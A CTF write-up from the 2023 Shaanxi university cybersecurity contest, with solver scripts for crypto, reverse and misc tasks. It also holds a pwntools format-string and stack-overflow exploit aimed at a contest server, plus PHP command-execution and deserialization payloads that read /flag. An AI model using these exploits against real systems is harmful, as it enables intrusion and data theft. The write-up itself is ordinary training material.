2023年第三届陕西省大学生网络安全技能大赛

队伍名:Dozer
成绩:29名

以下是题解

Crypto

HaM3

板子题,开套
https://blog.cryptohack.org/cryptoctf2021-easy#hamul
呃,跑不出来,加一层爆破

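from Crypto.Util.number import *
import gmpy2


# NOTE: factor() and .nbits() below are SageMath API, so this part is meant to
# be run inside a Sage session rather than plain CPython.
n = 142672086626283587048017713116658568907056287246536918432205313755474498483915485435443731126588499776739329317569276048159601495493064346081295993762052633

# n = PP*QQ where PP = P||Q, QQ = Q||P, P = p||q, Q = q||p (decimal
# concatenation). Because of that nesting the leading and trailing digits of
# n are the leading and trailing digits of p*q, so only the three middle
# digits of p*q have to be brute-forced before factoring the candidate.
high = str(n)[:18]
low = str(n)[-18:]
pq = [int(high + str(mid).zfill(3) + low) for mid in range(1000)]

for x in pq:
    f = factor(x)
    # keep the candidate that splits into exactly two 64-bit primes
    if len(f) == 2 and f[0][0].nbits() == 64:
        p, q = f[0][0], f[1][0]
        print(p, q)
        break

p, q = 9937378783676979077, 14357114660923972229
c = 35771468551700967499031290145813826705314774357494021918317304230766070868171631520643911378972522363861624359732252684003796428570328730483253546904382041
e = 65537

# Rebuild the moduli exactly as the challenge does: the original line used
# undefined names P/Q, so they are now computed explicitly.
P = int(str(p) + str(q))
Q = int(str(q) + str(p))
PP = int(str(P) + str(Q))
QQ = int(str(Q) + str(P))
d = inverse(e, (PP - 1) * (QQ - 1))
m = pow(c, d, PP * QQ)
print(long_to_bytes(m))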

奇怪的sar

在这个网站找了脚本,用enc得到 p^q的值

https://blog.csdn.net/superprintf/article/details/108964563

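n =  137670797028117726329534659376416493367957852768263083700434198723955223922183386928456013703791817601151754417828367188186912209697081337658512940425529211281290630976671911327606706953154608427885071841566358882014021242768190762103365969320014710368160869517966437591299370072284930202718943785099916898209
output =  [101737402423360536260958229788866250367716256968287178187558336481872788309727545478736771692477306412259739856568227009850831432381180909815512654609798228982433082928392936844193974517574281026029228179913579225687286945054175762659252515268270399329404664775893089132101252158524000295899895962104782878103, 37355684997487259669354747104430314505839306993101096210478266975184357608742619438151118843905165289324251734149329596611854110739738607745107961453008343886403511257039401245484528985856920723694142989180291902939107642020398816995584650913417698279936585230648639613028793148102494100898288564799111024672, 58677759595639211550435023449462812079890625834313820227189340593596480924226619376872336960357021314847975570175387751632125898437020801920862764666175594874885587518469384576361008639967382152477408865298759987606155830674598034578657554841283906976808719095766296677147076808250022898199866472085742989883, 61841632061818470036288407041172200048676249787061823756736224887116113640875444187463656719652972233582538657844183320242896612625995507633237074900538692102956750184024574603018257213912795847625926653585010890014291951218199774765624860625726555381815237888483974246173727262881650634287497285246796321130, 7618244158597756867387754433401378508070531356170836765779245254233413235386172690733378371343899289510629513166609513857423499004879497768588665836034791151090648182168421570449377835494883902907064269417199065924565304966242954268460876762295575715334403142360198583318323418975108290758222653083011275844, 106276841058222138994123556391380518368163552919305398852484130331884811278068151915582752795463570013359693610495645946230044828403849434903415989487924763756589202218361370725532394478569304449884620166937809374355282324069422109879874964479199929174533104879048175102339134830614476339153367475243140156049, 
54574757236475194407137831004617398270525645136836468973535243574661043352422598443323384197261529289829451787586618886007968913414366545291507686451774653217577858375086817168124727394445167274831801876424578654786480330913650363551771258617533162477541882336257099777912519011890593910515860435759936717781, 15567087904962670212229825713697043597876172881256160613623383896576159414077875401117959132252949501643234465895697270909085179587988268864498823765197994781747034644583869111599516151129007414228897958635533561248099927507725880289417298814703767549313482346652043188826434944367260731729064673486516315207, 10757138067445225320504771816863593606847219020279502671965413470243269270456133564739090471033889069283122519782525412134604896073598293410977787230108853737796640474070194546344190858079847734817109910030714675258996740807873872365037296486121580542250452443305370358407408558223735250474249180772656905880, 68097848963949068260912124852455363245291187860801223898468533992003737157497436432969031551088942445561676359631354280979357356539429863946694570097104716411407829017684705171462511875250672979623888463245258237680782731827727876526411531354910982579164963119481534453651300645314177478026462894232377307020]


def MMI(A, n):
    """Return the modular inverse of ``A`` modulo ``n`` as a value in ``[0, n)``.

    Iterative extended Euclid. It replaces the recursive one-line lambda,
    which silently returned -1 (or hit a ZeroDivisionError) when ``A`` had
    no inverse.

    Raises:
        ValueError: if ``gcd(A, n) != 1``.
    """
    old_r, r = A % n, n
    old_s, s = 1, 0
    while r:
        quotient = old_r // r
        old_r, r = r, old_r - quotient * r
        old_s, s = s, old_s - quotient * s
    if old_r != 1:
        raise ValueError('%d has no inverse modulo %d' % (A, n))
    return old_s % n


# Three consecutive outputs x0, x1, x2 of an LCG x_{i+1} = a*x_i + b (mod n)
# pin down the multiplier and increment:
#   a = (x2 - x1) / (x1 - x0),  b = x1 - a*x0,
# and the state preceding x0 is seed = a^-1 * (x0 - b).
a = (output[2] - output[1]) * MMI(output[1] - output[0], n) % n
ani = MMI(a, n)
b = (output[1] - a * output[0]) % n
seed = (ani * (output[0] - b)) % n
plaintext = seed
print(seed)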

注意到题目中 n=p*q 且 seed=p^q。可以用下面这个项目的脚本由 p^q 分解 n

https://github.com/sliedes/xor_factor

#!/usr/bin/env python3

import math
import sys

def check_cong(k, p, q, n, xored=None):
    """Test whether (p, q) is consistent with n (and p^q) in the low k bits.

    All arguments are reduced modulo 2**k; p*q must equal n there, and when
    ``xored`` is given p ^ q must also match its low k bits.
    """
    mask = (1 << k) - 1
    lo_p, lo_q, lo_n = p & mask, q & mask, n & mask
    if (lo_p * lo_q) & mask != lo_n:
        return False
    if xored is None:
        return True
    return (lo_p ^ lo_q) == (xored & mask)

def extend(k, a):
    """Yield the two k-bit extensions of the (k-1)-bit value ``a``.

    Emits ``a`` (new top bit clear) and then ``a`` with bit k-1 set.
    ``a`` must already fit in k-1 bits.
    """
    top = 1 << (k - 1)
    assert a < top
    yield from (a, a | top)

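def factor(n, p_xor_q):
    """Recover p and q from n = p*q and p ^ q by bit-wise lifting.

    Starting at the lowest bit, every tracked (p, q) pair is extended by one
    bit and kept only while p*q and p^q still agree with n and p_xor_q
    modulo 2**k. Pairs are stored sorted to drop the (p, q)/(q, p) symmetry.
    Only factors of at most ceil(bits(n)/2) bits can be reconstructed, so n
    is assumed to be a product of two similar-sized primes.

    Args:
        n: the modulus to split.
        p_xor_q: XOR of its two factors.

    Returns:
        (p, q) with p*q == n.

    Raises:
        ValueError: when no tracked pair multiplies to n (wrong p_xor_q, or
            factors too unbalanced for the lifting bound).
    """
    tracked = {(p, q) for p in (0, 1) for q in (0, 1)
               if check_cong(1, p, q, n, p_xor_q)}

    # ceil(log2(n) / 2) in exact integer arithmetic; the float-based
    # math.log(n, 2) can round the wrong way for a large n and then the
    # lifting stops one bit short of the larger factor.
    PRIME_BITS = (n.bit_length() + 1) // 2

    maxtracked = len(tracked)
    for k in range(2, PRIME_BITS + 1):
        newset = set()
        for tp, tq in tracked:
            for newp_ in extend(k, tp):
                for newq_ in extend(k, tq):
                    # Remove symmetry
                    newp, newq = sorted([newp_, newq_])
                    if check_cong(k, newp, newq, n, p_xor_q):
                        newset.add((newp, newq))

        tracked = newset
        if len(tracked) > maxtracked:
            maxtracked = len(tracked)
    print('Tracked set size: {} (max={})'.format(len(tracked), maxtracked))

    # go through the tracked set and pick the correct (p, q)
    for p, q in tracked:
        if p != 1 and p*q == n:
            return p, q

    # a bare assert is stripped under -O and would silently return None here
    raise ValueError('factors were not in tracked set. Is your p^q correct?')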

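def main():
    """Split n given p ^ q and print both factors.

    Usage: ``xor_factor.py n p_xor_q`` (both numbers in decimal). When the
    two arguments are not supplied the usage text is printed, as before, and
    the challenge values embedded below are used instead; the original
    version printed the usage text but then ignored argv entirely.

    Raises:
        ValueError: if an argument is not a decimal integer, or if factor()
            cannot find the factors.
    """
    if len(sys.argv) == 3:
        n = int(sys.argv[1])
        p_xor_q = int(sys.argv[2])
    else:
        print('Usage: xor_factor.py n p_xor_q', file=sys.stderr)
        print('(give both numbers in decimal)', file=sys.stderr)

        # fallback: the values from this challenge
        n =  24044063028844014127418595700558729326190738802687551098858513077613750188240082663594575453404975706225242363463089392757425008423696150244560748490108425645064339883915929498539109384801415313004805586193044292137299902797522618277016789979196782551492020031695781792205215671106103568559626617762521687128199445018651010056934305055040748892733145467040663073395258760159451903432330506383025685265502086582538667772105057401245864822281535425692919273252955571196166824113519446568745718898654447958192533288063735350717599092500158028352667339959012630051251024677881674246253876293205648190626145653304572328397
        p_xor_q = 39428646082513135314545544161912595458975375891528176714825766497155482031976852156313956476772023258684487799640179241987139554034654104867011313090105438798561154654679825702410748780286094326639330840289843154525176685892323447168072417654823748596238888125898914210332775882916911771786984574407163323116

    p, q = factor(n, p_xor_q)
    print(p)
    print(q)

if __name__ == '__main__':
    main()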
Usage: xor_factor.py n p_xor_q
(give both numbers in decimal)
Tracked set size: 456 (max=592)
136684274356315612487659217209422309110679526145315687701807802133803279866185818899991993884467313793599158843950483228582160463511388849758567202472905559846777250024605202939046541380251340624743050639969339200934727970697454003281829379562185118379160449090683059062519707425788095221998247228048681125693
175909504894211247364395617174091428768974985846552891279489073681785877028619520625043017232062800318796180901847503827906224008040782018396669843628458963255715414759414738416930428210387093039711088082737992450479987000339480311499183821667504225082440337907962316839883506834373795587694663967806384498129

分解之后就是正常的rsa

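from Crypto.Util.number import *

# p and q are the factors recovered by xor_factor.py; n and c are the
# challenge values. Everything below is textbook RSA decryption.
p = 136684274356315612487659217209422309110679526145315687701807802133803279866185818899991993884467313793599158843950483228582160463511388849758567202472905559846777250024605202939046541380251340624743050639969339200934727970697454003281829379562185118379160449090683059062519707425788095221998247228048681125693
q = 175909504894211247364395617174091428768974985846552891279489073681785877028619520625043017232062800318796180901847503827906224008040782018396669843628458963255715414759414738416930428210387093039711088082737992450479987000339480311499183821667504225082440337907962316839883506834373795587694663967806384498129
n =  24044063028844014127418595700558729326190738802687551098858513077613750188240082663594575453404975706225242363463089392757425008423696150244560748490108425645064339883915929498539109384801415313004805586193044292137299902797522618277016789979196782551492020031695781792205215671106103568559626617762521687128199445018651010056934305055040748892733145467040663073395258760159451903432330506383025685265502086582538667772105057401245864822281535425692919273252955571196166824113519446568745718898654447958192533288063735350717599092500158028352667339959012630051251024677881674246253876293205648190626145653304572328397
c =  14883053247652228283811442762780942186987432684268901119544211089991663825267989728286381980568977804079766160707988623895155236079459150322336701772385709429870215701045797411519212730389048862111088898917402253368572002593328131895422933030329446097639972123501482601377059155708292321789694103528266681104521268192526745361895856566384239849048923482217529011549596939269967690907738755747213669693953769070736092857407573675987242774763239531688324956444305397953424851627349331117467417542814921554060612622936755420459029769026126293588814831034143264949347763031994934813475762839410192390466491651507733968227

# p, q and n are three independent copy-pasted literals; fail loudly if they
# disagree instead of decrypting with a wrong private exponent.
if p * q != n:
    raise ValueError('p*q != n: the pasted factors do not match the modulus')

e = 65537
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))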

pwn

陕西游玩

首先checksec看一下

IDA打开

huashan是一个溢出点

格式化字符串泄露main函数,求基地址,找gadgets的地址,栈溢出即可

from pwn import *

p = remote("121.196.192.181", 10001)
# p = process("./kj")
elf = ELF('./kj')
context(log_level='debug', arch='amd64')
# gdb.attach(p)

# Menu option 2: the format-string read-back of stack slot 19 leaks an
# address inside the binary; subtracting its in-image offset gives the
# PIE base, from which the gadget address is derived.
p.sendlineafter(b"Your choice :\n", b'2')
p.sendafter(b"Welcome to Terra_Cotta_Warriors\n", b'%19$p')
base = int(p.recv(14), 16) - 0x12eb
print("base=", hex(base))
docker = base + 0x129A

# Menu option 1 (huashan): 0x28 bytes of padding followed by the gadget
# address overwrite the saved return address.
p.sendlineafter(b"Your choice :\n", b'1')
p.recvuntil(b"Welcome to Huashan_Mountain\n")
p.sendline(b'a' * 0x28 + p64(docker))
p.interactive()

#flag{0758fce358ceab884ced023bf80e6bc4}

reverse

我的upx -d怎么坏了

upx手脱壳参考博客
https://blog.csdn.net/weixin_45986910/article/details/107993680
脱出来之后拖入ida

迷宫题,可能是脱得不够彻底,运行不了,直接静态看,可以看出是一个15*15的迷宫,直接写脚本画出迷宫

试了很多次,发现有限制是最短路径(
成功画出来后是这么走的

RRRDRRURRRRRRDDDDRDDD

flag 是这串路径字符串的 32 位小写 MD5 哈希值

babypython

下载下来是一个txt文件,点进去看发现是python字节码指令

翻到最后有个倒序的base64

=1nb0A3b7AUQwB3b84mQ/E0MvJUb+EXbx5TQwF3bt52bAZncsd9c

观察关键代码之后发现需要替换一些字符,脚本如下

# Reversed base64 text lifted from the tail of the bytecode dump; it is
# un-reversed and character-substituted below before being base64-decoded
# (the decoding step itself is done outside this script).
arr = '=1nb0A3b7AUQwB3b84mQ/E0MvJUb+EXbx5TQwF3bt52bAZncsd9c'

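def str_reverse3(s):
    """Return the characters of ``s`` in reverse order, joined into a str.

    ``"".join`` replaces the original character-by-character ``+=`` loop,
    which is quadratic on interpreters without the in-place concat trick.
    """
    return "".join(reversed(s))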


if __name__ == '__main__':
    rs = str_reverse3(arr)
    print(rs)
    # Substitutions recovered from the bytecode listing:
    # '1' -> 'g', '3' -> 'H', '9' -> 'W'; every other character is kept.
    fixups = str.maketrans('139', 'gHW')
    rs2 = rs.translate(fixups)
    print(rs2)


接下来先 base64 解码,然后对每个字符先减 3 再异或 8 即可

rs3 = "qglrv@onmlqpA>qmq>mBo3A?Bn<lppA@;lp4nx"
# Undo the per-character transform from the bytecode: subtract 3, then XOR 8.
rs4 = "".join(chr((ord(ch) - 3) ^ 8) for ch in rs3)
print(rs4)

WEB

unserialize

没禁掉PHP系统函数passthru,直接利用就可以了
?a=passthru ('cat /flag');

ezrce

要post传入:

 name=hahaha&qaq=eval(array_rand(array_flip(apache_request_headers())))

请求头添加

H: system('cat /flag');

Get传入

?key=admin

最终payload:

POST /?key=admin HTTP/1.1
Host: 4744404a.clsadp.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36 
Content-Type: application/x-www-form-urlencoded 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 
Accept-Encoding: gzip, deflate 
Accept-Language: zh-CN,zh;q=0.9 
Connection: close 
Content-Length: 70 
H: system('cat /flag'); 
name=hahaha&qaq=eval(array_rand(array_flip(apache_request_headers())))

ezpop

发现

/pop3ZTgMw.php

编写pop链
最终payload:

<?php
class night
{
    public $night;

    public function __construct()
    {
        $this->night = new day;
    }
}
class day
{
    public $day; // carrier for the next object in the chain; assigned after construction
}
class light
{
    public $light;

    public function __construct()
    {
        $inner = new day();
        $inner->day = new dark();
        $this->light = $inner;
    }
}

class dark
{
    // Default payload: a php://filter wrapper that base64-encodes /flag;
    // presumably consumed as a file path by the target's sink (not shown here).
    public $dark="php://filter/read=convert.base64-encode/resource=/flag";
}
// Chain: night -> day -> dark -> light -> day -> dark(filter payload).
$payload = new night();
$hop = new day();
$wrapper = new dark();
$wrapper->dark = new light();
$hop->day = $wrapper;
$payload->night = $hop;

echo serialize($payload);
?>

最终payload:

 O:5:"night":2:{s:5:"night";O:3:"day":1:{s:3:"day";O:4:"dark":1:{s:4:"dark";O:5:"light":1:{s:5:"light";O:3:"day":1:{s:3:"day";O:4:"dark":1:{s:4:"dark";s:54:"php://filter/read=convert.base64-encode/resource=/flag";}}}}}}

Misc

可是雪啊飘进双眼

音频后半段有摩斯密码
 

SNOW.exe得到压缩包密码
shanxiroujiamo
压缩包里面key.jpg有隐藏文件  

密码表解密

BC1PVEYD  
用steghide 得到flag  

管道

Bilockchain

被销毁的flag

原数据: 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  
utf-8
€@R4€aW€ý[Pflag{S0met1m4s_d4t0ryUP_c4n_n0t_d4t0ry}UPa€an9óþ€@R4€W€ý[P6<W5à€c0QAW€cIís”[W€cƒ~ðuW[`€ý[`G`}V[`@Q`R‘`¯V[`@Q€‘ó[`a`ƒV[`@Q`l‘`¯V[`@Q€‘ó[`{`‰V[[`TV[`TV[3sÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ[``ÈV[‚RPPV[`` ‚P`Â`ƒ„`¢V[’‘PPV[`P‘PVþ¢dipfsX" Tù "í4
Mt?*–8ÞÄ_dD%câÕÊÿ‡œ·Ë:dsolcC 3

拼接:flag{S0met1m4s_d4t0ry_c4n_n0t_d4t0ry}

re复现

babycoffey
下载发现是js混淆代码,找到js解混淆网站
https://tool.yuanrenxue.cn/decode_obfuscator

查看源代码直接写脚本就可以了

c = [233, 129, 127, 238, 145, 144, 11, 43, 87, 134, 243, 158, 197, 216, 111, 136, 152, 29, 204, 31, 26, 228, 39, 148, 215, 220, 90, 76, 251, 57, 183, 184, 150, 157, 156, 176, 13, 41, 30, 86, 244, 8]
arr = [135, 25, 72, 151, 195, 212, 228, 212, 250, 101, 39, 77, 163, 77, 70, 167, 119, 184, 7, 77, 144, 154, 93, 10, 185, 48, 179, 77, 71, 163, 67, 61, 113, 156, 196, 136, 239, 241, 128, 93, 84, 156]
# The two original passes XOR arr[i] with c[41-i] and then with c[i]; each
# index is independent and XOR is associative, so one pass is equivalent.
for i in range(42):
    arr[i] ^= c[41 - i] ^ c[i]
print("".join(map(chr, arr)), end="")

flag{I_c0uld_neu3r_undeRstand_jvaVs3rIpt!}
